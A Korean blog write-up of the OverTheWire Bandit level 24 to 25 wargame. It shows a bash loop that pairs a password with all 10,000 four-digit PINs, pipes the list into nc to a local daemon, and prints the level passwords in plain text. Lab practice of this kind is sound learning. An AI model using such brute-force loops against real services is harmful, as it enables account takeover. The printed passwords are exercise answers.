[OverTheWire] bandit 24 -> 25

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
You do not need to create new connections each time

 

오늘 사용할 명령어

• vi
• nc
• bash

문제에서 브루트포스를 해보라고 하네요

브루트포스란(Brute:무식한-Force:)

: 무차별 대입 공격을 뜻하는 말로 가능한 모든 경우의 수를 모두 탐색하면서 요구조건에 충족되는 결과만을 가져온다고 합니다

 

그럼 brute-force를 하기위한 쉘 스크립트를 짜봐야겠죠?

#!/bin/bash

echo "Brute-Forcing Start"

bandit24_pass=gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8

for i in {0000..9999}
do
        echo $bandit24_pass $i >> bandit25_pass.txt
done

 

해당 쉘 스크립트를 실행시키면

bandit24@bandit:/tmp/miso$ bash brute-forcing.sh

bandit25_pass.txt 에 password와 pincode가 정렬이 되겠죠?

 

그래서 이걸 가지고 nc 명령어를 사용해서 데이터를 전송하고 bandit25 password를 받아봅시다

bandit24@bandit:/tmp/miso$ cat bandit25_pass.txt | nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct current password and pincode. Try again.
Wrong! Please enter the correct current password and pincode. Try again.
Wrong! Please enter the correct current password and pincode. Try again.
Wrong! Please enter the correct current password and pincode. Try again.
Wrong! Please enter the correct current password and pincode. Try again.
Wrong! Please enter the correct current password and pincode. Try again.
Wrong! Please enter the correct current password and pincode. Try again.
Wrong! Please enter the correct current password and pincode. Try again.
Wrong! Please enter the correct current password and pincode. Try again.
.
.
.
.
.
.
Correct!
The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4

이렇게 무차별 대입 공격을 통해 비밀번호를 가져올 수 있었습니다